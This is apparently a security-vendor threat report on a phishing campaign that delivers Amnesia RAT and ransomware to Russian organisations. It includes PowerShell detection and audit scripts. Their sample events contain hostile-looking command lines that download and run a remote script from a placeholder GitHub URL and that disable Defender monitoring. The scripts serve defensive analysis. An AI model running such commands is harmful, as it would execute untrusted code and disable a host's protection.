
Sophisticated Multi-Stage Phishing Attack Exploits Microsoft Windows in Russian Organizations Using Amnesia RAT and Hakuna Matata Ransomware

  • Rescana
  • 4 minutes ago
  • 4 min read

Executive Summary

A highly sophisticated multi-stage phishing campaign is currently targeting Russian organizations, leveraging advanced social engineering, public cloud infrastructure, and a combination of surveillance and destructive malware. The campaign delivers both the Amnesia RAT and a ransomware variant from the Hakuna Matata family, utilizing a complex infection chain that exploits native Microsoft Windows features rather than software vulnerabilities. Attackers employ business-themed lures, malicious shortcut files, and staged payloads hosted on GitHub and Dropbox. Notably, the campaign disables Microsoft Defender using the defendnot tool, ensuring persistent and stealthy operation. The attack culminates in data exfiltration, system surveillance, and file encryption, with significant impact on targeted organizations’ operations and data integrity.

Threat Actor Profile

While no direct attribution has been established, the campaign’s sophistication, targeting, and operational security suggest a well-resourced threat actor with a deep understanding of Russian business processes and Windows internals. The use of multi-stage payloads, Telegram-based command and control, and the integration of both Amnesia RAT and ransomware indicate a hybrid objective of espionage and financial gain. The campaign shares TTPs with previously observed operations such as Operation DupeHike and Paper Werewolf/GOFFEE, both of which have targeted Russian entities in recent months. The actor demonstrates a preference for abusing legitimate cloud services and messaging APIs to evade detection and maximize operational flexibility.

Technical Analysis of Malware/TTPs

The infection chain begins with spearphishing emails containing compressed archives (.zip or .rar) with Russian-language business lures. These archives contain malicious LNK files, often using double extensions (e.g., Задание_для_бухгалтера_02отдела.txt.lnk) to masquerade as benign documents. Upon execution, the LNK file launches a PowerShell command that downloads a first-stage script from a public GitHub repository (github[.]com/Mafin111/MafinREP111). This loader script executes in a hidden window, opens a decoy document to distract the user, and immediately notifies the attacker via the Telegram Bot API.

After a deliberate 444-second delay, the loader retrieves and executes a heavily obfuscated Visual Basic Script (SCRRC4ryuk.vbe). This script assembles the next payload in memory, checks for administrative privileges, and persistently prompts for UAC elevation if necessary. Once elevated, the script configures Microsoft Defender exclusions for critical directories and disables additional protections using PowerShell. The defendnot tool is then deployed to register a fake antivirus product, causing Microsoft Defender to disable itself entirely.

The malware proceeds to download a .NET-based surveillance module from GitHub, which captures screenshots every 30 seconds and exfiltrates them via Telegram. It also disables Windows administrative and diagnostic tools through registry modifications and hijacks file associations to display ransom messages. The final payloads are then deployed: the Amnesia RAT (delivered as svchost.scr from Dropbox) provides full remote access, data theft, and further malware deployment capabilities, while the ransomware component encrypts a wide range of file types and replaces clipboard cryptocurrency addresses with attacker-controlled wallets. A WinLocker module may also be activated to restrict user interaction post-encryption.

Command and control is maintained primarily through the Telegram Bot API over HTTPS, with large data sets exfiltrated via GoFile. Persistence is achieved through registry modifications and file association hijacking, ensuring the malware remains active across reboots and user sessions.
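The chain above leaves a recognisable sequence in process-creation telemetry. The following PowerShell is an added example (not code from the original report or the campaign's authors) that scores events shaped like Sysmon Event ID 1 records for three stages the report describes: a shortcut-launched hidden PowerShell fetching from GitHub or Dropbox, a .vbe run through wscript, and Defender exclusions set with Set-MpPreference. The field names, hostnames, user paths and the GitHub URL in the sample events are constructed placeholders.

```powershell
# Added example (not code from the original report or the campaign's authors).
# Scores process-creation events, with fields mimicking Sysmon Event ID 1, for the chain
# described above; only hosts that trip at least one rule appear in the output.
function Find-LnkPhishChain {
    param([Parameter(Mandatory)][object[]]$Events)
    $rules = @(
        @{ Stage = 'HiddenPowerShellFromShortcut'
           Test  = { param($e) $e.Image -match 'powershell\.exe$' -and
                     $e.ParentImage -match 'explorer\.exe$' -and
                     $e.CommandLine -match '-w(in|indowstyle)?\s+h(id|idden)?\b' -and
                     $e.CommandLine -match 'github(usercontent)?\.com|dropbox\.com' } }
        @{ Stage = 'ObfuscatedVbeExecution'
           Test  = { param($e) $e.Image -match '(w|c)script\.exe$' -and $e.CommandLine -match '\.vbe\b' } }
        @{ Stage = 'DefenderExclusionOrDisable'
           Test  = { param($e) $e.CommandLine -match 'Set-MpPreference' -and
                     $e.CommandLine -match '-Exclusion(Path|Process|Extension)|-DisableRealtimeMonitoring' } }
    )
    $hits = foreach ($evt in $Events) {
        foreach ($rule in $rules) {
            if (& $rule.Test $evt) {
                [pscustomobject]@{ Host = $evt.Host; Stage = $rule.Stage; CommandLine = $evt.CommandLine }
            }
        }
    }
    # One row per host; several distinct stages on one host is the strongest sign the full chain ran.
    $hits | Group-Object Host | ForEach-Object {
        $stages = @($_.Group.Stage | Sort-Object -Unique)
        [pscustomobject]@{ Host = $_.Name; StageCount = $stages.Count; Stages = ($stages -join ', ')
                           Verdict = $(if ($stages.Count -ge 2) { 'Likely full chain: isolate and triage' } else { 'Single indicator: review' }) }
    }
}

# Constructed sample events; hostnames, user paths and the GitHub URL are placeholders.
$ps = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
$sampleEvents = @(
    [pscustomobject]@{ Host = 'WS01'; Image = $ps; ParentImage = 'C:\Windows\explorer.exe'
                       CommandLine = 'powershell.exe -w hidden -ep bypass -c "iwr https://github.com/PLACEHOLDER-ORG/PLACEHOLDER-REPO/raw/main/s1.ps1 | iex"' }
    [pscustomobject]@{ Host = 'WS01'; Image = 'C:\Windows\System32\wscript.exe'; ParentImage = $ps
                       CommandLine = 'wscript.exe //B C:\Users\user\AppData\Local\Temp\SCRRC4ryuk.vbe' }
    [pscustomobject]@{ Host = 'WS01'; Image = $ps; ParentImage = 'C:\Windows\System32\wscript.exe'
                       CommandLine = 'powershell -c "Set-MpPreference -ExclusionPath C:\Users\user\AppData -DisableRealtimeMonitoring $true"' }
    [pscustomobject]@{ Host = 'WS02'; Image = $ps; ParentImage = 'C:\Windows\explorer.exe'
                       CommandLine = 'powershell.exe -NoProfile -File C:\Scripts\deploy.ps1' }   # benign: visible window, no download
)

Find-LnkPhishChain -Events $sampleEvents | Format-Table -AutoSize
```

On the sample data WS01 reports all three stages and WS02 produces no row; in production, feed the function objects built from Get-WinEvent output for the Sysmon operational log.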

Exploitation in the Wild

This campaign has been observed targeting Russian corporate entities, with a particular focus on human resources, payroll, and internal administration departments. The attackers exploit the trust inherent in business communications, using authentic-looking documents and filenames to increase the likelihood of user interaction. No software vulnerabilities or CVEs are exploited; the entire attack relies on social engineering and the abuse of legitimate Windows features such as PowerShell, VBScript, and registry manipulation.

Payloads observed in the wild include the Amnesia RAT, a variant of Hakuna Matata ransomware, and a WinLocker module. The campaign is ongoing, with new samples and infrastructure appearing regularly. Related activity has been linked to Operation DupeHike (UNG0902) and Paper Werewolf/GOFFEE, both of which have targeted Russian organizations with similar techniques and objectives.

Victimology and Targeting

The primary victims are Russian corporate entities, especially those in HR, payroll, and internal administration. The attackers demonstrate a nuanced understanding of Russian business workflows, crafting lures that are contextually relevant and likely to bypass initial suspicion. The campaign’s reliance on user interaction and native Windows features makes it broadly effective across all supported and unsupported versions of Microsoft Windows, including Windows 7, 8, 10, 11, and Windows Server editions. Additionally, the malware targets a wide range of applications for credential and data theft, including Chromium-based browsers (Chrome, Edge, Chromium, Brave, Opera, Opera GX, Vivaldi, Yandex), Telegram Desktop, Discord, Steam, and various cryptocurrency wallets such as MetaMask, Zcash, Armory, Bytecoin, Jaxx, Exodus, Ethereum, Electrum, Atomic Wallet, Guarda, and Coinomi.

Mitigation and Countermeasures

Organizations are strongly advised to enable Microsoft Defender Tamper Protection to prevent unauthorized changes to security settings. Continuous monitoring for suspicious PowerShell and registry activity is essential, as is the blocking of known malicious GitHub and Dropbox repositories and Telegram C2 traffic at the network perimeter. User education is critical: staff should be trained to recognize the risks associated with LNK files, double extensions, and unsolicited compressed archives. Regular audits should be conducted to detect unauthorized Defender exclusions and the presence of fake antivirus registrations, such as those created by the defendnot tool. Endpoint detection and response (EDR) solutions should be configured to alert on anomalous process execution, registry changes, and network connections to known malicious infrastructure.
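The audits recommended above can be scripted. The following PowerShell is an added example (not code from the original report) that checks one host for the conditions the report describes: Tamper Protection off, Defender exclusions or disabled monitoring, an antivirus registered with Windows Security Center that has no real signed binary (the defendnot technique), and policy registry values that lock users out of administrative tools. It assumes the Defender cmdlets are present and is meant to run elevated; the DisableTaskMgr, DisableRegistryTools and DisableCMD values are well-known policy values chosen here as examples, not values quoted from the report.

```powershell
# Added example, not from the original report. Audits a host for the tampering conditions
# the advisory describes. Requires the Defender PowerShell module; run from an elevated shell.
function Get-DefenderTamperingFindings {
    $findings = [System.Collections.Generic.List[string]]::new()
    try { $status = Get-MpComputerStatus -ErrorAction Stop }
    catch { $findings.Add("Get-MpComputerStatus failed ($($_.Exception.Message)): Defender service may be stopped"); $status = $null }
    if ($status) {
        if (-not $status.IsTamperProtected)         { $findings.Add('Tamper Protection is OFF') }
        if (-not $status.RealTimeProtectionEnabled) { $findings.Add('Real-time protection is OFF') }
        if ($status.AMRunningMode -ne 'Normal')     { $findings.Add("Defender mode is '$($status.AMRunningMode)': verify no other product claims the host") }
    }
    $pref = Get-MpPreference -ErrorAction SilentlyContinue
    if ($pref) {
        foreach ($p in $pref.ExclusionPath)      { $findings.Add("Exclusion path: $p") }
        foreach ($p in $pref.ExclusionProcess)   { $findings.Add("Exclusion process: $p") }
        foreach ($p in $pref.ExclusionExtension) { $findings.Add("Exclusion extension: $p") }
        if ($pref.DisableRealtimeMonitoring)     { $findings.Add('DisableRealtimeMonitoring is set') }
    }
    # Each registered product should point at an existing, validly signed executable.
    # Defender itself registers the URI 'windowsdefender://', so URI entries are skipped.
    # root/SecurityCenter2 exists on client editions of Windows, not on Windows Server.
    $avProducts = Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct -ErrorAction SilentlyContinue
    foreach ($av in $avProducts) {
        $exe = $av.pathToSignedProductExe
        if ($exe -match '^\w+://') { continue }
        if (-not $exe -or -not (Test-Path -LiteralPath $exe)) {
            $findings.Add("AV '$($av.displayName)' points at missing binary '$exe': possible fake registration")
        } elseif ((Get-AuthenticodeSignature -FilePath $exe).Status -ne 'Valid') {
            $findings.Add("AV '$($av.displayName)' binary '$exe' is not validly signed")
        }
    }
    # Policy values commonly abused to disable Task Manager, the registry editor and cmd.exe.
    $policyChecks = @(
        @{ Path = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\System'; Name = 'DisableTaskMgr' }
        @{ Path = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\System'; Name = 'DisableRegistryTools' }
        @{ Path = 'HKCU:\Software\Policies\Microsoft\Windows\System';                Name = 'DisableCMD' }
    )
    foreach ($c in $policyChecks) {
        $v = Get-ItemProperty -Path $c.Path -Name $c.Name -ErrorAction SilentlyContinue
        if ($v -and $v.($c.Name) -ne 0) { $findings.Add("$($c.Name) = $($v.($c.Name)) under $($c.Path)") }
    }
    if ($findings.Count -eq 0) { 'No Defender tampering indicators found.' } else { $findings }
}

Get-DefenderTamperingFindings
```

Any non-empty result warrants the EDR-level triage the paragraph describes, since an exclusion on a user-writable directory or an unsigned Security Center registration has no legitimate origin on a managed workstation.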


About Rescana

Rescana is a leader in third-party risk management (TPRM), providing organizations with a comprehensive platform to assess, monitor, and mitigate cyber risks across their supply chain and digital ecosystem. Our advanced threat intelligence and automation capabilities empower security teams to proactively identify and address emerging threats, ensuring robust protection for critical assets and business operations. For more information or to discuss how Rescana can support your cybersecurity strategy, we are happy to answer questions at ops@rescana.com.
